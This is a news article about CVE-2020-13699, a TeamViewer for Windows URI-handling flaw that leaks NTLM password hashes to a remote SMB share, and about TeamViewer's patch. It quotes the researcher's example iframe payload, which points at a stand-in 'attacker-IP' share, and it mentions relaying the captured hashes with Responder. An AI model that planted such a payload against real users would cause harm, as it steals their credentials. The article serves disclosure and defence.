TeamViewer recently patched a high-risk vulnerability in its desktop app for Windows by releasing a new version of its software, which if exploited, could let remote attackers steal your system password and potentially exploit it.
Whatโs more worrying is that this attack does not require the victimโs interaction and can be performed almost automatically.ย
For those unaware, TeamViewer is a popular software application developed by the German company TeamViewer GmbH, for remote control, desktop sharing, online meetings, web conferencing and file transfer between computers.
It is available for Microsoft Windows, Linux, macOS, Chrome OS, Android, iOS, Windows RT, Windows Phone 8, and BlackBerry operating systems. It is also possible to access a system running TeamViewer with a web browser.
The severe vulnerability dubbed asย CVE-2020-13699ย was first discovered by Jeffrey Hofmann, aย security researcherย from Praetorian. According to the researcher, the vulnerability resides in TeamViewer for Windows in the way the application quotes it’s custom URI (Unquoted URI handler).ย
The expert discovered that the issue could allow an attacker to force the software to relay an NTLM authentication request to the attackerโs system. In other words, an attacker can force TeamViewerโs URI scheme from a web page to trick the application installed on the victimโs system into initiating a connection to the attacker-owned remote SMB share.
This triggers the SMB authentication process, which in turn, will leak the systemโs username, and NTLMv2 hashed version of the password to the attackers.
In order to successfully exploit CVE 2020-13699, the attacker needs to embed a malicious iframe on a website and then trick victims into visiting that maliciously crafted URL. Once the victims click the link, TeamViewer will automatically launch its Windows desktop client and open a remote SMB share.
โAn attacker could embed a malicious iframe in a website with a crafted URL (iframe src=’teamviewer10: –play \\attacker-IP\share\fake.tvs’) that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share,โย explainedย Jeffrey Hofmann in an advisory.ย
โWindows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking).โ
This vulnerability affects “URI handlers teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1,”ย Hofmann said.
Upon disclosure of the vulnerability, the TeamViewer project has patched the flaw by quoting the parameters passed by the affected URI handlers e.g., URL:teamviewer10 Protocol “C:\Program Files (x86)\TeamViewer\TeamViewer.exe” “%1”.ย
In order to patch the flaw, โWe implemented some improvements in URI handling relating to CVE 2020-13699,โ said TeamViewer in aย statement. โThank you, Jeffrey Hofmann with Praetorian, for your professionalism, and following a responsible disclosure model. We are grateful that you reached out to us and that you could confirm the fix of your findings in the latest release.โ
In order to address the issue, TeamViewer has released the version 15.8.3 and recommends its users to upgrade immediately to this version.ย
Also Read- Best Teamviewer alternatives